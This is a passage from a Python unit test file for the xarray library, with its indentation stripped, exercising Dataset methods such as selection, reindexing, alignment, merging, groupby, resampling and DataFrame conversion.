data.sel(time=(data['time.dayofyear'] <= 3)))
td = pd.to_timedelta(np.arange(3), unit='days')
data = Dataset({'x': ('td', np.arange(3)), 'td': td})
self.assertDatasetEqual(data, data.sel(td=td))
self.assertDatasetEqual(data, data.sel(td=slice('3 days')))
self.assertDatasetEqual(data.isel(td=0), data.sel(td='0 days'))
self.assertDatasetEqual(data.isel(td=0), data.sel(td='0h'))
self.assertDatasetEqual(data.isel(td=slice(1, 3)),
data.sel(td=slice('1 days', '2 days')))
def test_isel_points(self):
data = create_test_data()
pdim1 = [1, 2, 3]
pdim2 = [4, 5, 1]
pdim3 = [1, 2, 3]
actual = data.isel_points(dim1=pdim1, dim2=pdim2, dim3=pdim3,
dim='test_coord')
assert 'test_coord' in actual.coords
assert actual.coords['test_coord'].shape == (len(pdim1), )
actual = data.isel_points(dim1=pdim1, dim2=pdim2)
assert 'points' in actual.coords
np.testing.assert_array_equal(pdim1, actual['dim1'])
# test that the order of the indexers doesn't matter
self.assertDatasetIdentical(data.isel_points(dim1=pdim1, dim2=pdim2),
data.isel_points(dim2=pdim2, dim1=pdim1))
# make sure we're raising errors in the right places
with self.assertRaisesRegexp(ValueError,
'All indexers must be the same length'):
data.isel_points(dim1=[1, 2], dim2=[1, 2, 3])
with self.assertRaisesRegexp(ValueError,
'dimension bad_key does not exist'):
data.isel_points(bad_key=[1, 2])
with self.assertRaisesRegexp(TypeError, 'Indexers must be integers'):
data.isel_points(dim1=[1.5, 2.2])
with self.assertRaisesRegexp(TypeError, 'Indexers must be integers'):
data.isel_points(dim1=[1, 2, 3], dim2=slice(3))
with self.assertRaisesRegexp(ValueError,
'Indexers must be 1 dimensional'):
data.isel_points(dim1=1, dim2=2)
with self.assertRaisesRegexp(ValueError,
'Existing dimension names are not valid'):
data.isel_points(dim1=[1, 2], dim2=[1, 2], dim='dim2')
# test to be sure we keep around variables that were not indexed
ds = Dataset({'x': [1, 2, 3, 4], 'y': 0})
actual = ds.isel_points(x=[0, 1, 2])
self.assertDataArrayIdentical(ds['y'], actual['y'])
# tests using index or DataArray as a dim
stations = Dataset()
stations['station'] = ('station', ['A', 'B', 'C'])
stations['dim1s'] = ('station', [1, 2, 3])
stations['dim2s'] = ('station', [4, 5, 1])
actual = data.isel_points(dim1=stations['dim1s'],
dim2=stations['dim2s'],
dim=stations['station'])
assert 'station' in actual.coords
assert 'station' in actual.dims
self.assertDataArrayIdentical(actual['station'].drop(['dim1', 'dim2']),
stations['station'])
# make sure we get the default points coordinate when a list is passed
actual = data.isel_points(dim1=stations['dim1s'],
dim2=stations['dim2s'],
dim=['A', 'B', 'C'])
assert 'points' in actual.coords
# can pass a numpy array
data.isel_points(dim1=stations['dim1s'],
dim2=stations['dim2s'],
dim=np.array([4, 5, 6]))
def test_sel_points(self):
data = create_test_data()
pdim1 = [1, 2, 3]
pdim2 = [4, 5, 1]
pdim3 = [1, 2, 3]
expected = data.isel_points(dim1=pdim1, dim2=pdim2, dim3=pdim3,
dim='test_coord')
actual = data.sel_points(dim1=data.dim1[pdim1], dim2=data.dim2[pdim2],
dim3=data.dim3[pdim3], dim='test_coord')
self.assertDatasetIdentical(expected, actual)
data = Dataset({'foo': (('x', 'y'), np.arange(9).reshape(3, 3))})
expected = Dataset({'foo': ('points', [0, 4, 8])},
{'x': ('points', range(3)),
'y': ('points', range(3))})
actual = data.sel_points(x=[0.1, 1.1, 2.5], y=[0, 1.2, 2.0],
method='pad')
self.assertDatasetIdentical(expected, actual)
def test_sel_method(self):
data = create_test_data()
if pd.__version__ >= '0.16':
expected = data.sel(dim1=1)
actual = data.sel(dim1=0.95, method='nearest')
self.assertDatasetIdentical(expected, actual)
expected = data.sel(dim2=[1.5])
actual = data.sel(dim2=[1.45], method='backfill')
self.assertDatasetIdentical(expected, actual)
with self.assertRaisesRegexp(NotImplementedError, 'slice objects'):
data.sel(dim2=slice(1, 3), method='ffill')
def test_loc(self):
data = create_test_data()
expected = data.sel(dim3='a')
actual = data.loc[dict(dim3='a')]
self.assertDatasetIdentical(expected, actual)
with self.assertRaisesRegexp(TypeError, 'can only lookup dict'):
data.loc['a']
with self.assertRaises(TypeError):
data.loc[dict(dim3='a')] = 0
def test_reindex_like(self):
data = create_test_data()
data['letters'] = ('dim3', 10 * ['a'])
expected = data.isel(dim1=slice(10), time=slice(13))
actual = data.reindex_like(expected)
self.assertDatasetIdentical(actual, expected)
expected = data.copy(deep=True)
expected['dim3'] = ('dim3', list('cdefghijkl'))
expected['var3'][:-2] = expected['var3'][2:]
expected['var3'][-2:] = np.nan
expected['letters'] = expected['letters'].astype(object)
expected['letters'][-2:] = np.nan
expected['numbers'] = expected['numbers'].astype(float)
expected['numbers'][:-2] = expected['numbers'][2:].values
expected['numbers'][-2:] = np.nan
actual = data.reindex_like(expected)
self.assertDatasetIdentical(actual, expected)
def test_reindex(self):
data = create_test_data()
self.assertDatasetIdentical(data, data.reindex())
expected = data.isel(dim1=slice(10))
actual = data.reindex(dim1=data['dim1'][:10])
self.assertDatasetIdentical(actual, expected)
actual = data.reindex(dim1=data['dim1'][:10].values)
self.assertDatasetIdentical(actual, expected)
actual = data.reindex(dim1=data['dim1'][:10].to_index())
self.assertDatasetIdentical(actual, expected)
# test dict-like argument
actual = data.reindex({'dim1': data['dim1'][:10]})
self.assertDatasetIdentical(actual, expected)
with self.assertRaisesRegexp(ValueError, 'cannot specify both'):
data.reindex({'x': 0}, x=0)
with self.assertRaisesRegexp(ValueError, 'dictionary'):
data.reindex('foo')
# out of order
expected = data.sel(dim1=data['dim1'][:10:-1])
actual = data.reindex(dim1=data['dim1'][:10:-1])
self.assertDatasetIdentical(actual, expected)
# regression test for #279
expected = Dataset({'x': ('time', np.random.randn(5))})
time2 = DataArray(np.arange(5), dims="time2")
actual = expected.reindex(time=time2)
self.assertDatasetIdentical(actual, expected)
# another regression test
ds = Dataset({'foo': (['x', 'y'], np.zeros((3, 4)))})
expected = Dataset({'foo': (['x', 'y'], np.zeros((3, 2))),
'x': [0, 1, 3]})
expected['foo'][-1] = np.nan
actual = ds.reindex(x=[0, 1, 3], y=[0, 1])
self.assertDatasetIdentical(expected, actual)
def test_reindex_method(self):
ds = Dataset({'x': ('y', [10, 20])})
y = [-0.5, 0.5, 1.5]
actual = ds.reindex(y=y, method='backfill')
expected = Dataset({'x': ('y', [10, 20, np.nan]), 'y': y})
self.assertDatasetIdentical(expected, actual)
actual = ds.reindex(y=y, method='pad')
expected = Dataset({'x': ('y', [np.nan, 10, 20]), 'y': y})
self.assertDatasetIdentical(expected, actual)
alt = Dataset({'y': y})
actual = ds.reindex_like(alt, method='pad')
self.assertDatasetIdentical(expected, actual)
def test_align(self):
left = create_test_data()
right = left.copy(deep=True)
right['dim3'] = ('dim3', list('cdefghijkl'))
right['var3'][:-2] = right['var3'][2:]
right['var3'][-2:] = np.random.randn(*right['var3'][-2:].shape)
right['numbers'][:-2] = right['numbers'][2:]
right['numbers'][-2:] = -10
intersection = list('cdefghij')
union = list('abcdefghijkl')
left2, right2 = align(left, right, join='inner')
self.assertArrayEqual(left2['dim3'], intersection)
self.assertDatasetIdentical(left2, right2)
left2, right2 = align(left, right, join='outer')
self.assertVariableEqual(left2['dim3'], right2['dim3'])
self.assertArrayEqual(left2['dim3'], union)
self.assertDatasetIdentical(left2.sel(dim3=intersection),
right2.sel(dim3=intersection))
self.assertTrue(np.isnan(left2['var3'][-2:]).all())
self.assertTrue(np.isnan(right2['var3'][:2]).all())
left2, right2 = align(left, right, join='left')
self.assertVariableEqual(left2['dim3'], right2['dim3'])
self.assertVariableEqual(left2['dim3'], left['dim3'])
self.assertDatasetIdentical(left2.sel(dim3=intersection),
right2.sel(dim3=intersection))
self.assertTrue(np.isnan(right2['var3'][:2]).all())
left2, right2 = align(left, right, join='right')
self.assertVariableEqual(left2['dim3'], right2['dim3'])
self.assertVariableEqual(left2['dim3'], right['dim3'])
self.assertDatasetIdentical(left2.sel(dim3=intersection),
right2.sel(dim3=intersection))
self.assertTrue(np.isnan(left2['var3'][-2:]).all())
with self.assertRaisesRegexp(ValueError, 'invalid value for join'):
align(left, right, join='foobar')
with self.assertRaises(TypeError):
align(left, right, foo='bar')
def test_variable_indexing(self):
data = create_test_data()
v = data['var1']
d1 = data['dim1']
d2 = data['dim2']
self.assertVariableEqual(v, v[d1.values])
self.assertVariableEqual(v, v[d1])
self.assertVariableEqual(v[:3], v[d1 < 3])
self.assertVariableEqual(v[:, 3:], v[:, d2 >= 1.5])
self.assertVariableEqual(v[:3, 3:], v[d1 < 3, d2 >= 1.5])
self.assertVariableEqual(v[:3, :2], v[range(3), range(2)])
self.assertVariableEqual(v[:3, :2], v.loc[d1[:3], d2[:2]])
def test_drop_variables(self):
data = create_test_data()
self.assertDatasetIdentical(data, data.drop([]))
expected = Dataset(dict((k, data[k]) for k in data if k != 'time'))
actual = data.drop('time')
self.assertDatasetIdentical(expected, actual)
actual = data.drop(['time'])
self.assertDatasetIdentical(expected, actual)
expected = Dataset(dict((k, data[k]) for
k in ['dim2', 'dim3', 'time', 'numbers']))
actual = data.drop('dim1')
self.assertDatasetIdentical(expected, actual)
with self.assertRaisesRegexp(ValueError, 'cannot be found'):
data.drop('not_found_here')
def test_drop_index_labels(self):
data = Dataset({'A': (['x', 'y'], np.random.randn(2, 3)),
'x': ['a', 'b']})
actual = data.drop(1, 'y')
expected = data.isel(y=[0, 2])
self.assertDatasetIdentical(expected, actual)
actual = data.drop(['a'], 'x')
expected = data.isel(x=[1])
self.assertDatasetIdentical(expected, actual)
actual = data.drop(['a', 'b'], 'x')
expected = data.isel(x=slice(0, 0))
self.assertDatasetIdentical(expected, actual)
with self.assertRaises(ValueError):
# not contained in axis
data.drop(['c'], dim='x')
def test_copy(self):
data = create_test_data()
for copied in [data.copy(deep=False), copy(data)]:
self.assertDatasetIdentical(data, copied)
for k in data:
v0 = data.variables[k]
v1 = copied.variables[k]
self.assertIs(v0, v1)
copied['foo'] = ('z', np.arange(5))
self.assertNotIn('foo', data)
for copied in [data.copy(deep=True), deepcopy(data)]:
self.assertDatasetIdentical(data, copied)
for k in data:
v0 = data.variables[k]
v1 = copied.variables[k]
self.assertIsNot(v0, v1)
def test_rename(self):
data = create_test_data()
newnames = {'var1': 'renamed_var1', 'dim2': 'renamed_dim2'}
renamed = data.rename(newnames)
variables = OrderedDict(data.variables)
for k, v in iteritems(newnames):
variables[v] = variables.pop(k)
for k, v in iteritems(variables):
dims = list(v.dims)
for name, newname in iteritems(newnames):
if name in dims:
dims[dims.index(name)] = newname
self.assertVariableEqual(Variable(dims, v.values, v.attrs),
renamed[k])
self.assertEqual(v.encoding, renamed[k].encoding)
self.assertEqual(type(v), type(renamed.variables[k]))
self.assertTrue('var1' not in renamed)
self.assertTrue('dim2' not in renamed)
with self.assertRaisesRegexp(ValueError, "cannot rename 'not_a_var'"):
data.rename({'not_a_var': 'nada'})
# verify that we can rename a variable without accessing the data
var1 = data['var1']
data['var1'] = (var1.dims, InaccessibleArray(var1.values))
renamed = data.rename(newnames)
with self.assertRaises(UnexpectedDataAccess):
renamed['renamed_var1'].values
def test_rename_inplace(self):
times = pd.date_range('2000-01-01', periods=3)
data = Dataset({'z': ('x', [2, 3, 4]), 't': ('t', times)})
copied = data.copy()
renamed = data.rename({'x': 'y'})
data.rename({'x': 'y'}, inplace=True)
self.assertDatasetIdentical(data, renamed)
self.assertFalse(data.equals(copied))
self.assertEquals(data.dims, {'y': 3, 't': 3})
# check virtual variables
self.assertArrayEqual(data['t.dayofyear'], [1, 2, 3])
def test_swap_dims(self):
original = Dataset({'x': [1, 2, 3], 'y': ('x', list('abc')), 'z': 42})
expected = Dataset({'z': 42}, {'x': ('y', [1, 2, 3]), 'y': list('abc')})
actual = original.swap_dims({'x': 'y'})
self.assertDatasetIdentical(expected, actual)
self.assertIsInstance(actual.variables['y'], Coordinate)
self.assertIsInstance(actual.variables['x'], Variable)
roundtripped = actual.swap_dims({'y': 'x'})
self.assertDatasetIdentical(original.set_coords('y'), roundtripped)
actual = original.copy()
actual.swap_dims({'x': 'y'}, inplace=True)
self.assertDatasetIdentical(expected, actual)
with self.assertRaisesRegexp(ValueError, 'cannot swap'):
original.swap_dims({'y': 'x'})
with self.assertRaisesRegexp(ValueError, 'replacement dimension'):
original.swap_dims({'x': 'z'})
def test_update(self):
data = create_test_data(seed=0)
expected = data.copy()
var2 = Variable('dim1', np.arange(8))
actual = data.update({'var2': var2})
expected['var2'] = var2
self.assertDatasetIdentical(expected, actual)
actual = data.copy()
actual_result = actual.update(data, inplace=True)
self.assertIs(actual_result, actual)
self.assertDatasetIdentical(expected, actual)
actual = data.update(data, inplace=False)
expected = data
self.assertIsNot(actual, expected)
self.assertDatasetIdentical(expected, actual)
other = Dataset(attrs={'new': 'attr'})
actual = data.copy()
actual.update(other)
self.assertDatasetIdentical(expected, actual)
def test_update_auto_align(self):
ds = Dataset({'x': ('t', [3, 4])})
expected = Dataset({'x': ('t', [3, 4]), 'y': ('t', [np.nan, 5])})
actual = ds.copy()
other = {'y': ('t', [5]), 't': [1]}
with self.assertRaisesRegexp(ValueError, 'conflicting sizes'):
actual.update(other)
actual.update(Dataset(other))
self.assertDatasetIdentical(expected, actual)
actual = ds.copy()
other = Dataset({'y': ('t', [5]), 't': [100]})
actual.update(other)
expected = Dataset({'x': ('t', [3, 4]), 'y': ('t', [np.nan] * 2)})
self.assertDatasetIdentical(expected, actual)
def test_merge(self):
data = create_test_data()
ds1 = data[['var1']]
ds2 = data[['var3']]
expected = data[['var1', 'var3']]
actual = ds1.merge(ds2)
self.assertDatasetIdentical(expected, actual)
actual = ds2.merge(ds1)
self.assertDatasetIdentical(expected, actual)
actual = data.merge(data)
self.assertDatasetIdentical(data, actual)
actual = data.reset_coords(drop=True).merge(data)
self.assertDatasetIdentical(data, actual)
actual = data.merge(data.reset_coords(drop=True))
self.assertDatasetIdentical(data, actual)
with self.assertRaises(ValueError):
ds1.merge(ds2.rename({'var3': 'var1'}))
with self.assertRaisesRegexp(ValueError, 'cannot merge'):
data.reset_coords().merge(data)
with self.assertRaisesRegexp(ValueError, 'cannot merge'):
data.merge(data.reset_coords())
def test_merge_broadcast_equals(self):
ds1 = Dataset({'x': 0})
ds2 = Dataset({'x': ('y', [0, 0])})
actual = ds1.merge(ds2)
self.assertDatasetIdentical(ds2, actual)
actual = ds2.merge(ds1)
self.assertDatasetIdentical(ds2, actual)
actual = ds1.copy()
actual.update(ds2)
self.assertDatasetIdentical(ds2, actual)
ds1 = Dataset({'x': np.nan})
ds2 = Dataset({'x': ('y', [np.nan, np.nan])})
actual = ds1.merge(ds2)
self.assertDatasetIdentical(ds2, actual)
def test_merge_compat(self):
ds1 = Dataset({'x': 0})
ds2 = Dataset({'x': 1})
for compat in ['broadcast_equals', 'equals', 'identical']:
with self.assertRaisesRegexp(ValueError, 'conflicting value'):
ds1.merge(ds2, compat=compat)
ds2 = Dataset({'x': [0, 0]})
for compat in ['equals', 'identical']:
with self.assertRaisesRegexp(ValueError, 'conflicting value'):
ds1.merge(ds2, compat=compat)
ds2 = Dataset({'x': ((), 0, {'foo': 'bar'})})
with self.assertRaisesRegexp(ValueError, 'conflicting value'):
ds1.merge(ds2, compat='identical')
with self.assertRaisesRegexp(ValueError, 'compat=\S+ invalid'):
ds1.merge(ds2, compat='foobar')
def test_merge_auto_align(self):
ds1 = Dataset({'a': ('x', [1, 2])})
ds2 = Dataset({'b': ('x', [3, 4]), 'x': [1, 2]})
expected = Dataset({'a': ('x', [1, 2, np.nan]),
'b': ('x', [np.nan, 3, 4])})
self.assertDatasetIdentical(expected, ds1.merge(ds2))
self.assertDatasetIdentical(expected, ds2.merge(ds1))
expected = expected.isel(x=slice(2))
self.assertDatasetIdentical(expected, ds1.merge(ds2, join='left'))
self.assertDatasetIdentical(expected, ds2.merge(ds1, join='right'))
expected = expected.isel(x=slice(1, 2))
self.assertDatasetIdentical(expected, ds1.merge(ds2, join='inner'))
self.assertDatasetIdentical(expected, ds2.merge(ds1, join='inner'))
def test_getitem(self):
data = create_test_data()
self.assertIsInstance(data['var1'], DataArray)
self.assertVariableEqual(data['var1'], data.variables['var1'])
with self.assertRaises(KeyError):
data['notfound']
with self.assertRaises(KeyError):
data[['var1', 'notfound']]
actual = data[['var1', 'var2']]
expected = Dataset({'var1': data['var1'], 'var2': data['var2']})
self.assertDatasetEqual(expected, actual)
actual = data['numbers']
expected = DataArray(data['numbers'].variable, [data['dim3']],
name='numbers')
self.assertDataArrayIdentical(expected, actual)
actual = data[dict(dim1=0)]
expected = data.isel(dim1=0)
self.assertDatasetIdentical(expected, actual)
def test_getitem_hashable(self):
data = create_test_data()
data[(3, 4)] = data['var1'] + 1
expected = data['var1'] + 1
expected.name = (3, 4)
self.assertDataArrayIdentical(expected, data[(3, 4)])
with self.assertRaisesRegexp(KeyError, "('var1', 'var2')"):
data[('var1', 'var2')]
def test_virtual_variables(self):
# access virtual variables
data = create_test_data()
expected = DataArray(1 + np.arange(20), coords=[data['time']],
dims='time', name='dayofyear')
self.assertDataArrayIdentical(expected, data['time.dayofyear'])
self.assertArrayEqual(data['time.month'].values,
data.variables['time'].to_index().month)
self.assertArrayEqual(data['time.season'].values, 'DJF')
# test virtual variable math
self.assertArrayEqual(data['time.dayofyear'] + 1, 2 + np.arange(20))
self.assertArrayEqual(np.sin(data['time.dayofyear']),
np.sin(1 + np.arange(20)))
# ensure they become coordinates
expected = Dataset({}, {'dayofyear': data['time.dayofyear']})
actual = data[['time.dayofyear']]
self.assertDatasetEqual(expected, actual)
# non-coordinate variables
ds = Dataset({'t': ('x', pd.date_range('2000-01-01', periods=3))})
self.assertTrue((ds['t.year'] == 2000).all())
def test_time_season(self):
ds = Dataset({'t': pd.date_range('2000-01-01', periods=12, freq='M')})
expected = ['DJF'] * 2 + ['MAM'] * 3 + ['JJA'] * 3 + ['SON'] * 3 + ['DJF']
self.assertArrayEqual(expected, ds['t.season'])
def test_slice_virtual_variable(self):
data = create_test_data()
self.assertVariableEqual(data['time.dayofyear'][:10],
Variable(['time'], 1 + np.arange(10)))
self.assertVariableEqual(data['time.dayofyear'][0], Variable([], 1))
def test_setitem(self):
# assign a variable
var = Variable(['dim1'], np.random.randn(8))
data1 = create_test_data()
data1['A'] = var
data2 = data1.copy()
data2['A'] = var
self.assertDatasetIdentical(data1, data2)
# assign a dataset array
dv = 2 * data2['A']
data1['B'] = dv.variable
data2['B'] = dv
self.assertDatasetIdentical(data1, data2)
# can't assign an ND array without dimensions
with self.assertRaisesRegexp(ValueError,
'dimensions .* must have the same len'):
data2['C'] = var.values.reshape(2, 4)
# but can assign a 1D array
data1['C'] = var.values
data2['C'] = ('C', var.values)
self.assertDatasetIdentical(data1, data2)
# can assign a scalar
data1['scalar'] = 0
data2['scalar'] = ([], 0)
self.assertDatasetIdentical(data1, data2)
# can't use the same dimension name as a scalar var
with self.assertRaisesRegexp(ValueError, 'cannot merge'):
data1['newvar'] = ('scalar', [3, 4, 5])
# can't resize a used dimension
with self.assertRaisesRegexp(ValueError, 'conflicting sizes'):
data1['dim1'] = data1['dim1'][:5]
# override an existing value
data1['A'] = 3 * data2['A']
self.assertVariableEqual(data1['A'], 3 * data2['A'])
with self.assertRaises(NotImplementedError):
data1[{'x': 0}] = 0
def test_setitem_auto_align(self):
ds = Dataset()
ds['x'] = ('y', range(3))
ds['y'] = 1 + np.arange(3)
expected = Dataset({'x': ('y', range(3)), 'y': 1 + np.arange(3)})
self.assertDatasetIdentical(ds, expected)
ds['y'] = DataArray(range(3), dims='y')
expected = Dataset({'x': ('y', range(3))})
self.assertDatasetIdentical(ds, expected)
ds['x'] = DataArray([1, 2], dims='y')
expected = Dataset({'x': ('y', [1, 2, np.nan])})
self.assertDatasetIdentical(ds, expected)
ds['x'] = 42
expected = Dataset({'x': 42, 'y': range(3)})
self.assertDatasetIdentical(ds, expected)
ds['x'] = DataArray([4, 5, 6, 7], dims='y')
expected = Dataset({'x': ('y', [4, 5, 6])})
self.assertDatasetIdentical(ds, expected)
def test_assign(self):
ds = Dataset()
actual = ds.assign(x = [0, 1, 2], y = 2)
expected = Dataset({'x': [0, 1, 2], 'y': 2})
self.assertDatasetIdentical(actual, expected)
self.assertEqual(list(actual), ['x', 'y'])
self.assertDatasetIdentical(ds, Dataset())
actual = actual.assign(y = lambda ds: ds.x ** 2)
expected = Dataset({'y': ('x', [0, 1, 4])})
self.assertDatasetIdentical(actual, expected)
actual = actual.assign_coords(z = 2)
expected = Dataset({'y': ('x', [0, 1, 4])}, {'z': 2})
self.assertDatasetIdentical(actual, expected)
ds = Dataset({'a': ('x', range(3))}, {'b': ('x', ['A'] * 2 + ['B'])})
actual = ds.groupby('b').assign(c = lambda ds: 2 * ds.a)
expected = ds.merge({'c': ('x', [0, 2, 4])})
self.assertDatasetIdentical(actual, expected)
actual = ds.groupby('b').assign(c = lambda ds: ds.a.sum())
expected = ds.merge({'c': ('x', [1, 1, 2])})
self.assertDatasetIdentical(actual, expected)
actual = ds.groupby('b').assign_coords(c = lambda ds: ds.a.sum())
expected = expected.set_coords('c')
self.assertDatasetIdentical(actual, expected)
def test_delitem(self):
data = create_test_data()
all_items = set(data)
self.assertItemsEqual(data, all_items)
del data['var1']
self.assertItemsEqual(data, all_items - set(['var1']))
del data['dim1']
self.assertItemsEqual(data, set(['time', 'dim2', 'dim3', 'numbers']))
self.assertNotIn('dim1', data.dims)
self.assertNotIn('dim1', data.coords)
def test_squeeze(self):
data = Dataset({'foo': (['x', 'y', 'z'], [[[1], [2]]])})
for args in [[], [['x']], [['x', 'z']]]:
def get_args(v):
return [set(args[0]) & set(v.dims)] if args else []
expected = Dataset(dict((k, v.squeeze(*get_args(v)))
for k, v in iteritems(data.variables)))
expected.set_coords(data.coords, inplace=True)
self.assertDatasetIdentical(expected, data.squeeze(*args))
# invalid squeeze
with self.assertRaisesRegexp(ValueError, 'cannot select a dimension'):
data.squeeze('y')
def test_groupby(self):
data = Dataset({'z': (['x', 'y'], np.random.randn(3, 5))},
{'x': ('x', list('abc')),
'c': ('x', [0, 1, 0])})
groupby = data.groupby('x')
self.assertEqual(len(groupby), 3)
expected_groups = {'a': 0, 'b': 1, 'c': 2}
self.assertEqual(groupby.groups, expected_groups)
expected_items = [('a', data.isel(x=0)),
('b', data.isel(x=1)),
('c', data.isel(x=2))]
for actual, expected in zip(groupby, expected_items):
self.assertEqual(actual[0], expected[0])
self.assertDatasetEqual(actual[1], expected[1])
identity = lambda x: x
for k in ['x', 'c', 'y']:
actual = data.groupby(k, squeeze=False).apply(identity)
self.assertDatasetEqual(data, actual)
def test_groupby_returns_new_type(self):
data = Dataset({'z': (['x', 'y'], np.random.randn(3, 5))})
actual = data.groupby('x').apply(lambda ds: ds['z'])
expected = data['z']
self.assertDataArrayIdentical(expected, actual)
actual = data['z'].groupby('x').apply(lambda x: x.to_dataset())
expected = data
self.assertDatasetIdentical(expected, actual)
def test_groupby_iter(self):
data = create_test_data()
for n, (t, sub) in enumerate(list(data.groupby('dim1'))[:3]):
self.assertEqual(data['dim1'][n], t)
self.assertVariableEqual(data['var1'][n], sub['var1'])
self.assertVariableEqual(data['var2'][n], sub['var2'])
self.assertVariableEqual(data['var3'][:, n], sub['var3'])
def test_groupby_errors(self):
data = create_test_data()
with self.assertRaisesRegexp(ValueError, 'must be 1 dimensional'):
data.groupby('var1')
with self.assertRaisesRegexp(ValueError, 'must have a name'):
data.groupby(np.arange(10))
with self.assertRaisesRegexp(ValueError, 'length does not match'):
data.groupby(data['dim1'][:3])
with self.assertRaisesRegexp(ValueError, "must have a 'dims'"):
data.groupby(data.coords['dim1'].to_index())
def test_groupby_reduce(self):
data = Dataset({'xy': (['x', 'y'], np.random.randn(3, 4)),
'xonly': ('x', np.random.randn(3)),
'yonly': ('y', np.random.randn(4)),
'letters': ('y', ['a', 'a', 'b', 'b'])})
expected = data.mean('y')
expected['yonly'] = expected['yonly'].variable.expand_dims({'x': 3})
actual = data.groupby('x').mean()
self.assertDatasetAllClose(expected, actual)
actual = data.groupby('x').mean('y')
self.assertDatasetAllClose(expected, actual)
letters = data['letters']
expected = Dataset({'xy': data['xy'].groupby(letters).mean(),
'xonly': (data['xonly'].mean().variable
.expand_dims({'letters': 2})),
'yonly': data['yonly'].groupby(letters).mean()})
actual = data.groupby('letters').mean()
self.assertDatasetAllClose(expected, actual)
def test_groupby_math(self):
reorder_dims = lambda x: x.transpose('dim1', 'dim2', 'dim3', 'time')
ds = create_test_data()
for squeeze in [True, False]:
grouped = ds.groupby('dim1', squeeze=squeeze)
expected = reorder_dims(ds + ds.coords['dim1'])
actual = grouped + ds.coords['dim1']
self.assertDatasetIdentical(expected, reorder_dims(actual))
actual = ds.coords['dim1'] + grouped
self.assertDatasetIdentical(expected, reorder_dims(actual))
ds2 = 2 * ds
expected = reorder_dims(ds + ds2)
actual = grouped + ds2
self.assertDatasetIdentical(expected, reorder_dims(actual))
actual = ds2 + grouped
self.assertDatasetIdentical(expected, reorder_dims(actual))
grouped = ds.groupby('numbers')
zeros = DataArray([0, 0, 0, 0], [('numbers', range(4))])
expected = ((ds + Variable('dim3', np.zeros(10)))
.transpose('dim3', 'dim1', 'dim2', 'time'))
actual = grouped + zeros
self.assertDatasetEqual(expected, actual)
actual = zeros + grouped
self.assertDatasetEqual(expected, actual)
with self.assertRaisesRegexp(ValueError, 'dimensions .* do not exist'):
grouped + ds
with self.assertRaisesRegexp(ValueError, 'dimensions .* do not exist'):
ds + grouped
with self.assertRaisesRegexp(TypeError, 'only support binary ops'):
grouped + 1
with self.assertRaisesRegexp(TypeError, 'only support binary ops'):
grouped + grouped
with self.assertRaisesRegexp(TypeError, 'in-place operations'):
ds += grouped
ds = Dataset({'x': ('time', np.arange(100)),
'time': pd.date_range('2000-01-01', periods=100)})
with self.assertRaisesRegexp(ValueError, 'no overlapping labels'):
ds + ds.groupby('time.month')
def test_groupby_math_virtual(self):
ds = Dataset({'x': ('t', [1, 2, 3])},
{'t': pd.date_range('20100101', periods=3)})
grouped = ds.groupby('t.day')
actual = grouped - grouped.mean()
expected = Dataset({'x': ('t', [0, 0, 0])},
ds[['t', 't.day']])
self.assertDatasetIdentical(actual, expected)
def test_groupby_nan(self):
# nan should be excluded from groupby
ds = Dataset({'foo': ('x', [1, 2, 3, 4])},
{'bar': ('x', [1, 1, 2, np.nan])})
actual = ds.groupby('bar').mean()
expected = Dataset({'foo': ('bar', [1.5, 3]), 'bar': [1, 2]})
self.assertDatasetIdentical(actual, expected)
def test_resample_and_first(self):
times = pd.date_range('2000-01-01', freq='6H', periods=10)
ds = Dataset({'foo': (['time', 'x', 'y'], np.random.randn(10, 5, 3)),
'bar': ('time', np.random.randn(10), {'meta': 'data'}),
'time': times})
actual = ds.resample('1D', dim='time', how='first')
expected = ds.isel(time=[0, 4, 8])
self.assertDatasetIdentical(expected, actual)
# upsampling
expected_time = pd.date_range('2000-01-01', freq='3H', periods=19)
expected = ds.reindex(time=expected_time)
for how in ['mean', 'sum', 'first', 'last', np.mean]:
actual = ds.resample('3H', 'time', how=how)
self.assertDatasetEqual(expected, actual)
def test_to_array(self):
ds = Dataset(OrderedDict([('a', 1), ('b', ('x', [1, 2, 3]))]),
coords={'c': 42}, attrs={'Conventions': 'None'})
data = [[1, 1, 1], [1, 2, 3]]
coords = {'x': range(3), 'c': 42, 'variable': ['a', 'b']}
dims = ('variable', 'x')
expected = DataArray(data, coords, dims, attrs=ds.attrs)
actual = ds.to_array()
self.assertDataArrayIdentical(expected, actual)
actual = ds.to_array('abc', name='foo')
expected = expected.rename({'variable': 'abc'}).rename('foo')
self.assertDataArrayIdentical(expected, actual)
def test_to_and_from_dataframe(self):
x = np.random.randn(10)
y = np.random.randn(10)
t = list('abcdefghij')
ds = Dataset(OrderedDict([('a', ('t', x)),
('b', ('t', y)),
('t', ('t', t))]))
expected = pd.DataFrame(np.array([x, y]).T, columns=['a', 'b'],
index=pd.Index(t, name='t'))
actual = ds.to_dataframe()
# use the .equals method to check all DataFrame metadata
assert expected.equals(actual), (expected, actual)
# verify coords are included
actual = ds.set_coords('b').to_dataframe()
assert expected.equals(actual), (expected, actual)
# check roundtrip
self.assertDatasetIdentical(ds, Dataset.from_dataframe(actual))
# test a case with a MultiIndex
w = np.random.randn(2, 3)
ds = Dataset({'w': (('x', 'y'), w)})
ds['y'] = ('y', list('abc'))
exp_index = pd.MultiIndex.from_arrays(
[[0, 0, 0, 1, 1, 1], ['a', 'b', 'c', 'a', 'b', 'c']],
names=['x', 'y'])
expected = pd.DataFrame(w.reshape(-1), columns=['w'], index=exp_index)
actual = ds.to_dataframe()
self.assertTrue(expected.equals(actual))
# check roundtrip
self.assertDatasetIdentical(ds, Dataset.from_dataframe(actual))
# check pathological cases
df = pd.DataFrame([1])
actual = Dataset.from_dataframe(df)
expected = Dataset({0: ('index', [1])})
self.assertDatasetIdentical(expected, actual)
df = pd.DataFrame()
actual = Dataset.from_dataframe(df)
expected = Dataset()
self.assertDatasetIdentical(expected, actual)
# regression test for GH278
# use int64 to ensure consistent results for the pandas .equals method
# on windows (which requires the same dtype)
ds = Dataset({'x': pd.Index(['bar']),
'a': ('y', np.array([1], 'int64'))}).isel(x=0)
# use .loc to ensure consistent results on Python 3
actual = ds.to_dataframe().loc[:, ['a', 'x']]
expected = pd.DataFrame([[1, 'bar']], index=pd.Index([0], name='y'),
columns=['a', 'x'])
assert expected.equals(actual), (expected, actual)
ds = Dataset({'x': np.array([0], 'int64'),
'y': np.array([1], 'int64')})
actual = ds.to_dataframe()
idx = pd.MultiIndex.from_arrays([[0], [1]], names=['x', 'y'])
expected = pd.DataFrame([[]], index=idx)
assert expected.equals(actual), (expected, actual)
